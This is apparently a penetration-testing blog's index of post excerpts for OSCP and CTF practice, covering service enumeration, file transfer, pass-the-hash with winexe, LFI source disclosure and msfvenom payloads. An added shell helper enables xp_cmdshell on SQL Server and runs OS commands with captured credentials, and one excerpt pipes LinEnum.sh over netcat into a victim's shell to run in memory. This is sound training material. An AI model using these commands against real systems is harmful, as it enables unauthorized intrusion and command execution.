Cheat Sheets & Tips/Tricks

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

Abraham Lincoln

Recent Posts

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to the server from the command line and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default. We’ll start by connecting to our target w/ the following command. sqsh -S <ipAddress> -U <user> -P <password> […]
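As an added example (not code from the original post), the shell helper below emits the T-SQL batch that turns xp_cmdshell on and runs one OS command, then feeds it to sqsh over stdin the way you would from Kali. The host, user and password in the usage line are placeholders; it also assumes the login holds sysadmin (or ALTER SETTINGS) on the target and that sqsh reads the batch from stdin (if not, save the batch to a file and pass it with -i).

```shell
# Added example, not from the original post. Builds the T-SQL that enables
# xp_cmdshell (show advanced options -> xp_cmdshell -> RECONFIGURE) and runs
# one command through it, then pipes the whole batch to sqsh.
# Assumption: sqsh reads commands from stdin; "go" is its batch terminator.

# xp_cmdshell_batch CMD -> T-SQL batches on stdout
xp_cmdshell_batch() {
  local cmd escaped
  cmd="$1"
  # T-SQL string literals are single-quoted; double any embedded quote so the
  # command text cannot terminate the literal early.
  escaped=$(printf '%s' "$cmd" | sed "s/'/''/g")
  cat <<EOF
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
go
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
go
EXEC master..xp_cmdshell '${escaped}'
go
EOF
}

# run_xp_cmdshell HOST USER PASS CMD -> sends the batch to the server (needs network)
run_xp_cmdshell() {
  xp_cmdshell_batch "$4" | sqsh -S "$1" -U "$2" -P "$3"
}

# Usage (placeholder target): run_xp_cmdshell 10.10.10.5 sa 'Password1' 'whoami'
```

Both sp_configure changes persist on the server and are visible in the SQL error log, so set 'xp_cmdshell' back to 0 (same batch shape, with 0 in place of 1) when you are done if the engagement calls for cleanup.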

Enumerating FTP for Pentesting (Port 21)

Basic Enumeration Attempt to connect anonymously by issuing the below command and specifying the following credentials: anonymous:anonymous. ftp <ipAddress> You can perform banner grabbing w/ the following Metasploit module. use auxiliary/scanner/ftp/ftp_version You can perform brute force with the following Metasploit module. use auxiliary/scanner/ftp/ftp_login Transferring Files If you have valid credentials, you can use the following […]

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster? Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the '--wildcard' switch Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, […]

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured an NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash. Basic syntax w/ credentials. […]

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them. Uploading and Hosting Files Python Web Server The following will start a webserver in the […]

Using ps.py To Monitor Linux Processes

While working through TheCyberMentor’s Linux Privesc course, I learned something new and wanted to place this here so I can refer to it later. There’s a box on TryHackMe called ConvertMyVideo. This post does not intend to serve as a walk-through or write-up of that box, but rather is using it as an example […]

Command Injection Tips


Enumerating HTTP Ports (80, 443, 8080, etc.)

When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers. Web Application – WordPress, CMS, Drupal, etc. Web Technologies – Node.js, PHP, Java, etc. Web Server – Apache, IIS, Nginx, etc. Database – MySQL, MariaDB, […]

Setting Up BurpSuite

Once Burp loads up, there are a few things we need to configure to make our lives easier. Installing and Configuring FoxyProxy First, to make our lives easier, let’s install the Firefox add-on for FoxyProxy. With the add-on installed, let’s head into the Options. Now we can Add a new entry. Let’s create the New […]

Enumerating SMB for Pentesting (Ports 445, 139)

Using NMAP Scan for popular RCE exploits (quote the script glob so the shell does not expand it). sudo nmap -p 139,445 --script "smb-vuln*" <ip-addr> -oA nmap/smb-vuln Identify the SMB/OS version. nmap -v -p 139,445 --script=smb-os-discovery.nse <ip-addr> Using SMBMAP To list out the shares and associated permissions: smbmap -H <ip-addr> To list out the shares recursively: smbmap -R <sharename> -H <ip-addr> To list shares as an […]

File Transfer in Linux: Uploading & Executing in Memory

This example will show us uploading LinEnum.sh to a victim machine and piping it straight into a shell so that it runs from memory and we write nothing to the hard-drive. On our attacking box, find the executable you wish to transfer and run the following command: cat <filename> | nc -nvlp 9002 On the victim machine, change into the […]

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

If you find a Local File Inclusion (LFI) in an application running PHP, you’re able to leverage a PHP wrapper to return the file Base64-encoded instead of executing it, which you can then decode on your own machine to view the source-code of the page. In this example, we’ll be using FRIENDZONE on HackTheBox. Confirming LFI on our example At the following […]

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method. In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines. We’ll do that here. There is a […]
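As an added example (not code from the original post), the two shell functions below pack a file into a single pasteable line carrying its SHA-256 and Base64 text, and unpack it on the far side while refusing to keep the result if the checksum does not match. That check matters with copy/paste: a dropped or extra character is often still valid Base64 and decodes to a silently corrupted file. It assumes GNU coreutils as found on Kali (base64 -d, sha256sum).

```shell
# Added example, not from the original post. Packs a file as one line
# "<sha256>:<base64>" and unpacks it with an integrity check.
# Assumes GNU coreutils (base64 -d, sha256sum).

# b64_pack FILE -> one line: <sha256 of FILE>:<base64 of FILE>
b64_pack() {
  local sum
  sum=$(sha256sum "$1" | cut -d' ' -f1)
  printf '%s:' "$sum"
  base64 "$1" | tr -d '\n'
  printf '\n'
}

# b64_unpack OUTFILE < packed_line ; returns 1 on decode or checksum failure
b64_unpack() {
  local out line sum data got
  out="$1"
  IFS= read -r line || [ -n "$line" ]   # tolerate a missing trailing newline
  sum=${line%%:*}
  data=${line#*:}
  if ! printf '%s' "$data" | base64 -d > "$out.tmp" 2>/dev/null; then
    rm -f "$out.tmp"; return 1
  fi
  got=$(sha256sum "$out.tmp" | cut -d' ' -f1)
  if [ "$got" != "$sum" ]; then
    rm -f "$out.tmp"; return 1          # never leave a corrupted file behind
  fi
  mv "$out.tmp" "$out"
}

# Usage: on the attacking box  b64_pack linpeas.sh      (copy the line)
#        on the victim          echo '<paste>' | b64_unpack linpeas.sh
```

On a victim where you cannot define the function, `cut -d: -f2 | base64 -d > file` followed by a manual `sha256sum file` against the prefix does the same job. Keep this for small files: Base64 grows the payload by about a third and many terminals mangle very long pasted lines.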

Upgrading Simple Shells to Interactive TTYs w/ Python

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly. Once you have a reverse shell, start by running the command python -c 'import pty;pty.spawn("/bin/bash")' Now we’ll background the window with Ctrl + […]

Tmux Cheatsheet for Splitting Terminal Panes and More

Note: <PrefixKey> by default is Ctrl + B Creating Tmux Sessions and Windows tmux new -s Example Create a new tmux session titled “Example” <PrefixKey> + C Create a new window within the session <PrefixKey> + Number Take you to your different windows. Windows are identified by the banner down below. <PrefixKey> + , Rename […]

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources. Enumerating Common Services Enumerating SMB 139,445 Using smbmap and smbclient to crawl and […]

Unzipping Rockyou.txt.gz in Kali Linux

Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future. sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. Table of Contents:– Non Meterpreter Binaries– Non Meterpreter Web Payloads– Meterpreter Binaries– Meterpreter Web Payloads Non-Meterpreter Binaries Staged Payloads for Windows x86 […]

